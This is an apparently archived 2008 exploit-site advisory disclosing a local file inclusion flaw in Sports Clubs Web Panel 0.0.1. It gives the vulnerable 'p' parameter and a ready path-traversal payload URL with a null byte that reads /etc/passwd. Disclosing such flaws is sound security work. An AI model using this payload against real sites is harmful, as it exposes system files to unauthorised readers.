[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Sports Clubs Web Panel 0.0.1 (p) Local File Inclusion Vulnerability
# Published : 2008-09-11
# Author : StAkeR
# Previous Title : Autodealers CMS AutOnline (pageid) SQL Injection Vulnerability
# Next Title : Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit


--==+============================================================================+==--
--==+   Sports Clubs Web Panel 0.0.1 Local File Inclusion Vulnerability          +==--    
--==+============================================================================+==--

 [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
 [+] Discovered On: 11 Sep 2008
 [+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370

 [*] Vulnerability:
 
 [*] LFI
 [+] index.php?p= [File %00]
 [+] http://site.com/index.php?p=../../../../../../../etc/passwd%00

# www.Syue.com [2008-09-11]